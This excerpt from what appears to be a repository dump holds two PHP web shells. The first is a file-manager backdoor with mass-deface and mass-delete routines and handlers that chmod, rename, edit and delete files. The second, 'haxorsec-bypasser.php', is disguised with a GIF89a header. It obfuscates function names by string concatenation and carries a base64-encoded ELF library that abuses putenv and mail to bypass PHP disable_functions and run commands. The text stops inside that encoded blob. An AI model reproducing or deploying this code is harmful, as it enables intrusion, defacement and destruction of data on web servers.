"; 583 | file_put_contents($location, $file); 584 | if($type === "-alldir") { 585 | massdeface($path, $file, $filename, "-alldir"); 586 | } 587 | } 588 | } 589 | } 590 | } 591 | 592 | function massdelete($dir, $filename) { 593 | $scandir = scandir($dir); 594 | foreach($scandir as $dir_) { 595 | $path = "$dir/$dir_"; 596 | $location = "$path/$filename"; 597 | if($dir_ === '.') { 598 | if(file_exists("$dir/$filename")) { 599 | unlink("$dir/$filename"); 600 | } 601 | } 602 | elseif($dir_ === '..') { 603 | if(file_exists(dirname($dir)."/$filename")) { 604 | unlink(dirname($dir)."/$filename"); 605 | } 606 | } 607 | else { 608 | if(is_dir($path) AND is_writable($path)) { 609 | if(file_exists($location)) { 610 | print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."
"; 611 | unlink($location); 612 | massdelete($path, $filename); 613 | } 614 | } 615 | } 616 | } 617 | } 618 | 619 | if (isset($_GET['fileloc'])) { 620 | echo "Current File : ".$_GET['fileloc']; 621 | echo '
'; 622 | echo "
".htmlspecialchars(file_get_contents($_GET['fileloc']))."
"; 623 | author(); 624 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { 625 | if (is_dir($_POST['path'])) { 626 | xrmdir($_POST['path']); 627 | if (file_exists($_POST['path'])) { 628 | red("Failed to delete Directory !"); 629 | } else { 630 | green("Delete Directory Success !"); 631 | echo "string"; 632 | } 633 | } elseif (is_file($_POST['path'])) { 634 | @unlink($_POST['path']); 635 | if (file_exists($_POST['path'])) { 636 | red("Failed to Delete File !"); 637 | } else { 638 | green("Delete File Success !"); 639 | } 640 | } 641 | elseif($_GET['do'] === "mass") { 642 | if($_POST['start']) { 643 | if($_POST['mass_type'] === 'singledir') { 644 | print "
"; 645 | massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']); 646 | print "
"; 647 | } 648 | elseif($_POST['mass_type'] === 'alldir') { 649 | print "
"; 650 | massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir"); 651 | print "
"; 652 | } 653 | elseif($_POST['mass_type'] === "delete") { 654 | print "
"; 655 | massdelete($_POST['d_dir'], $_POST['d_file']); 656 | print "
"; 657 | } 658 | } 659 | else { 660 | print "
661 | Tipe Sabun:
662 | Mass Deface Single DirectoryMass Deface All DirectoryMass Delete File
663 | ( kosongkan 'Index File' jika memilih Mass Delete File )

664 | Folder:
665 |

666 | Filename:
667 |

668 | Index File:
669 |
670 | 671 |
"; 672 | } 673 | } 674 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 675 | echo "
".$_POST['path']."
"; 676 | echo '
677 | Permission : 678 | 679 | 680 | 681 |
'; 682 | if (isset($_POST['chm0d'])) { 683 | $cm = @chmod($_POST['path'], $_POST['perm']); 684 | if ($cm == true) { 685 | green("Change Mod Success !"); 686 | } else { 687 | red("Change Mod Failed !"); 688 | } 689 | } 690 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { 691 | if (isset($_POST['gantin'])) { 692 | $ren = @rename($_POST['path'], $_POST['newname']); 693 | if ($ren == true) { 694 | green("Change Name Success !"); 695 | } else { 696 | red("Change Name Failed !"); 697 | } 698 | } 699 | if (empty($_POST['name'])) { 700 | $namaawal = $_POST['newname']; 701 | } else { 702 | $namawal = $_POST['name']; 703 | } 704 | echo "
".$_POST['path']."
"; 705 | echo '
706 | New Name : 707 | 708 | 709 | 710 |
'; 711 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 712 | if (isset($_POST['gasedit'])) { 713 | $edit = @file_put_contents($_POST['path'], $_POST['src']); 714 | if ($edit == true) { 715 | green("Edit File Success !"); 716 | } else { 717 | red("Edit File Failed !"); 718 | } 719 | } 720 | echo "
".$_POST['path']."

"; 721 | echo '
722 |
723 | 724 | 725 | 726 |

'; 727 | } 728 | 729 | echo '
730 | 731 | 732 | 733 | 734 | 735 | '; 736 | 737 | foreach($lokasinya as $dir){ 738 | if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue; 739 | echo " 740 | 741 | 742 | 749 | 761 | "; 762 | } 763 | 764 | echo ''; 765 | foreach($lokasinya as $file) { 766 | if(!is_file("$lokasi/$file")) continue; 767 | $size = filesize("$lokasi/$file")/1024; 768 | $size = round($size,3); 769 | if($size >= 1024){ 770 | $size = round($size/1024,2).' MB'; 771 | } else { 772 | $size = $size.' KB'; 773 | } 774 | 775 | echo " 776 | 777 | 778 | 797 | "; 798 | } 799 | 800 | echo '
Name
Size
Permissions
Options
".$dir."
--
"; 743 | if(is_writable($lokasi."/".$dir)) echo ''; 744 | elseif(!is_readable($lokasi."/".$dir)) echo ''; 745 | echo statusnya($lokasi."/".$dir); 746 | if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo ''; 747 | 748 | echo "
750 | 756 | 757 | 758 | 759 | \" /> 760 |
$file
".$size."
"; 779 | if(is_writable("$lokasi/$file")) echo ''; 780 | elseif(!is_readable("$lokasi/$file")) echo ''; 781 | echo statusnya("$lokasi/$file"); 782 | if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo ''; 783 | echo "
784 |
785 | 792 | 793 | 794 | 795 | \" /> 796 |
'; 801 | author(); 802 | ?> 803 | -------------------------------------------------------------------------------- /haxorsec-bypasser.php: -------------------------------------------------------------------------------- 1 | GIF89a; 2 | ;; 3 | 4 | 5 | 6 | BypassServ By HaxorSec 7 | 8 | 9 | 10 | 11 | 12 | 167 | 168 | 169 |
170 | [ mail() : [ ON ] ]"; 204 | } else { 205 | $mail = "[ mail() : [ OFF ] ]"; 206 | } 207 | if(function_exists('mb_send_mail')) { 208 | $mbb = "[ mb_send_mail() : [ ON ] ]"; 209 | }else{ 210 | $mbb = "[ mb_send_mail() : [ OFF ] ]"; 211 | } 212 | if(function_exists('error_log')) { 213 | $errr = "[ error_log() : [ ON ] ]"; 214 | }else{ 215 | $errr = "[ error_log() : [ OFF ] ]"; 216 | } 217 | if(function_exists('imap_mail')) { 218 | $impp = "[ imap_mail() : [ ON ] ]"; 219 | }else{ 220 | $impp = "[ imap_mail() : [ OFF ] ]
"; 221 | } 222 | 223 | 224 | 225 | 226 | echo "[ Command Bypas Status Wajib ON MAIL PUTENV @ HaxorSec]
"; 227 | if (function_exists('mail')) { 228 | echo $mail." ".$mbb." ".$errr." ".$impp; 229 | } else { 230 | echo $mail." ".$mbb." ".$errr." ".$impp; 231 | } 232 | if (function_exists('putenv')) { 233 | echo "[ Function putenv() ] : [ ON ]
"; 234 | } else { 235 | echo "[ Function putenv() ] : [ OFF ]
"; 236 | } 237 | foreach ($_GET as $c => $d) $_GET[$c] = y($d); 238 | 239 | $currentDirectory = $ril(isset($_GET['d']) ? $_GET['d'] : $rootDirectory); 240 | $chd($currentDirectory); 241 | 242 | $viewCommandResult = ''; 243 | 244 | if ($_SERVER['REQUEST_METHOD'] === 'POST') { 245 | if (isset($_FILES['fileToUpload'])) { 246 | $target_file = $currentDirectory . '/' . $bs($_FILES["fileToUpload"]["name"]); 247 | if ($mup($_FILES["fileToUpload"]["tmp_name"], $target_file)) { 248 | echo "
File " . $htm($bs($_FILES["fileToUpload"]["name"])) . " Upload success
"; 249 | } else { 250 | echo "
Sorry, there was an error uploading your file.
"; 251 | } 252 | } elseif (isset($_POST['folder_name']) && !empty($_POST['folder_name'])) { 253 | $ff = $_POST['folder_name']; 254 | $newFolder = $currentDirectory . '/' . $ff; 255 | if (!file_exists($newfolder)) { 256 | if ($mek($newFolder) !== false) { 257 | echo '
Folder created successfully!'; 258 | }else{ 259 | echo '
Error: Failed to create folder!'; 260 | } 261 | } 262 | 263 | } elseif (isset($_POST['file_name'])) { 264 | $fileName = $_POST['file_name']; 265 | $newFile = $currentDirectory . '/' . $fileName; 266 | if (!file_exists($newFile)) { 267 | if ($fpc($newFile, '') !== false) { 268 | echo '
File created successfully!' . $fileName .' '; 269 | $fileToView = $newFile; 270 | if (file_exists($fileToView)) { 271 | $fileContent = $fgc($fileToView); 272 | $viewCommandResult = '

Result: ' . $fileName . '

273 |
274 | 275 | 276 |
'; 277 | } else { 278 | $viewCommandResult = '

Error: File not found!

'; 279 | } 280 | } else { 281 | echo '
Error: Failed to create file!'; 282 | } 283 | }else{ 284 | echo '
Error: File Already Exists!'; 285 | } 286 | } elseif (isset($_POST['cmd_input'])){ 287 | $p = "p"."u"."t"."e"."n"."v"; 288 | $a = "fi"."le_p"."ut_c"."ont"."e"."nt"."s"; 289 | $m = "m"."a"."i"."l"; 290 | $base = "ba"."se"."64"."_"."de"."co"."de"; 291 | $en = "ba"."se"."64"."_"."en"."co"."de"; 292 | $mb = "m"."b"."_"."s"."e"."n"."d"."_"."m"."a"."i"."l"; 293 | $err = "e"."r"."r"."o"."r"."_"."l"."o"."g"; 294 | $drnm = "d"."i"."r"."n"."a"."m"."e"; 295 | $imp = "i"."m"."a"."p"."_"."m"."a"."i"."l"; 296 | $currentFilePath = $_SERVER['PHP_SELF']; 297 | $doc = $_SERVER['DOCUMENT_ROOT']; 298 | $directoryPath = $drnm($currentFilePath); 299 | $full = $doc . $directoryPath; 300 | $hook = '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BwAAAAwAAAAAAAAAAAAAAEiD7AhIiwW9CCAASIXAdAL/0EiDxAjDAP810gggAP8l1AggAA8fQAD/JdIIIABoAAAAAOng/////yXKCCAAaAEAAADp0P////8lwgggAGgCAAAA6cD/////JboIIABoAwAAAOmw/////yWyCCAAaAQAAADpoP////8lqgggAGgFAAAA6ZD/////JaIIIABoBgAAAOmA/////yWaCCAAaAcAAADpcP////8lkgggAGgIAAAA6WD/////JSIIIABmkAAAAAAAAAAASI09gQggAEiNBYEIIABVSCn4SInlSIP4DnYVSIsF1gcgAEiFwHQJXf/gZg8fRAAAXcMPH0AAZi4PH4QAAAAAAEiNPUEIIABIjTU6CCAAVUgp/kiJ5UjB/gNIifBIweg/SAHGSNH+dBhIiwWhByAASIXAdAxd/+BmDx+EAAAAAABdww8fQABmLg8fhAAAAAAAgD3xByAAAHUnSIM9dwcgAABVSInldAxIiz3SByAA6D3////oSP///13GBcgHIAAB88MPH0AAZi4PH4QAAAAAAEiNPVkFIABIgz8AdQvpXv///2YPH0QAAEiLBRkHIABIhcB06VVIieX/0F3pQP///1VIieVIjT16AAAA6FD+//++/wEAAEiJx+iT/v//SI09YQAAAOg3/v//SInH6E/+//+QXcNVSInlvgEAAAC/AQAAAOhZ/v//6JT+//+FwHQKvwAAAADodv7//5Bdw1VIieVIjT0lAAAA6FP+///o/v3//+gZ/v//kF3DAABIg+wISIPECMNDSEFOS1JPAExEX1BSRUxPQUQAARsDOzQAAAAFAAAAuP3//1AAAABY/v//eAAAAGj///+QAAAAnP///7AAAADF////0AAAAAAAAAAUAAAAAAAAAAF6UgABeBABGwwHCJABAAAkAAAAHAAAAGD9//+gAAAAAA4QRg4YSg8LdwiAAD8aOyozJCIAAAAAFAAAAEQAAADY/f//CAAAAAAAAAAAAAAAHAAAAFwAAADQ/v//NAAAAABBDhCGAkMNBm8MBwgAAAAcAAAAfAAAAOT+//8pAAAAAEEOEIYCQw0GZAwHCAAAABwAAACcAAAA7f7//x0AAAAAQQ4QhgJDDQZYDAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAgAAAAAAAAAAAAAAAAAAHAIAAAAAAAAAAAAAAAAAAABAAAAAAAAALsAAAAAAAAADAAAAAAAAAAYBwAAAAAAAA0AAAAAAAAAXAkAAAAAAAAZAAAAAAAAAPgNIAAAAAAAGwAAAAAAAAAQAAAAAAAAABoAAAAAAAAACA4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAADwAQAAAAAAAAUAAAAAAAAAMAQAAAAAAAAGAAAAAAAAADgCAAAAAAAACgAAAAAAAADpAAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAQIAAAAAAAAgAAAAAAAADYAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAAEAGAAAAAAAABwAAAAAAAABoBQAAAAAAAAgAAAAAAAAA2AAAAAAAAAAJAAAAAAAAABgAAAAAAAAA/v//bwAAAABIBQAAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAABoFAAAAAAAA+f//bwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgOIAAAAAAAAAAAAAAAAAAAAAAAAAAAAEYHAAAAAAAAVgcAAAAAAABmBwAAAAAAAHYHAAAAAAAAhgcAAAAAAACWBwAAAAAAAKYHAAAAAAAAtgcAAAAAAADGBwAAAAAAAGAQIAAAAAAAR0NDOiAoRGViaWFuIDYuMy4wLTE4K2RlYjl1MSkgNi4zLjAgMjAxNzA1MTYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAQDIAQAAAAAAAAAAAAAAAAAAAAAAAAMAAgDwAQAAAAAAAAAAAAAAAAAAAAAAAAMAAwA4AgAAAAAAAAAAAAAAAAAAAAAAAAMABAAwBAAAAAAAAAAAAAAAAAAAAAAAAAMABQAaBQAAAAAAAAAAAAAAAAAAAAAAAAMABgBIBQAAAAAAAAAAAAAAAAAAAAAAAAMABwBoBQAAAAAAAAAAAAAAAAAAAAAAAAMACABABgAAAAAAAAAAAAAAAAAAAAAAAAMACQAYBwAAAAAAAAAAAAAAAAAAAAAAAAMACgAwBwAAAAAAAAAAAAAAAAAAAAAAAAMACwDQBwAAAAAAAAAAAAAAAAAAAAAAAAMADADgBwAAAAAAAAAAAAAAAAAAAAAAAAMADQBcCQAAAAAAAAAAAAAAAAAAAAAAAAMADgBlCQAAAAAAAAAAAAAAAAAAAAAAAAMADwB4CQAAAAAAAAAAAAAAAAAAAAAAAAMAEACwCQAAAAAAAAAAAAAAAAAAAAAAAAMAEQD4DSAAAAAAAAAAAAAAAAAAAAAAAAMAEgAIDiAAAAAAAAAAAAAAAAAAAAAAAAMAEwAQDiAAAAAAAAAAAAAAAAAAAAAAAAMAFAAYDiAAAAAAAAAAAAAAAAAAAAAAAAMAFQDYDyAAAAAAAAAAAAAAAAAAAAAAAAMAFgAAECAAAAAAAAAAAAAAAAAAAAAAAAMAFwBgECAAAAAAAAAAAAAAAAAAAAAAAAMAGABoECAAAAAAAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAADAAAAAEAEwAQDiAAAAAAAAAAAAAAAAAAGQAAAAIADADgBwAAAAAAAAAAAAAAAAAAGwAAAAIADAAgCAAAAAAAAAAAAAAAAAAALgAAAAIADABwCAAAAAAAAAAAAAAAAAAARAAAAAEAGABoECAAAAAAAAEAAAAAAAAAUwAAAAEAEgAIDiAAAAAAAAAAAAAAAAAAegAAAAIADACwCAAAAAAAAAAAAAAAAAAAhgAAAAEAEQD4DSAAAAAAAAAAAAAAAAAApQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAArAAAAAEAEABoCgAAAAAAAAAAAAAAAAAAugAAAAEAEwAQDiAAAAAAAAAAAAAAAAAAAAAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAxgAAAAEAFwBgECAAAAAAAAAAAAAAAAAA0wAAAAEAFAAYDiAAAAAAAAAAAAAAAAAA3AAAAAAADwB4CQAAAAAAAAAAAAAAAAAA7wAAAAEAFwBoECAAAAAAAAAAAAAAAAAA+wAAAAEAFgAAECAAAAAAAAAAAAAAAAAAEQEAABIAAAAAAAAAAAAAAAAAAAAAAAAAJQEAACAAAAAAAAAAAAAAAAAAAAAAAAAAQQEAABAAFwBoECAAAAAAAAAAAAAAAAAA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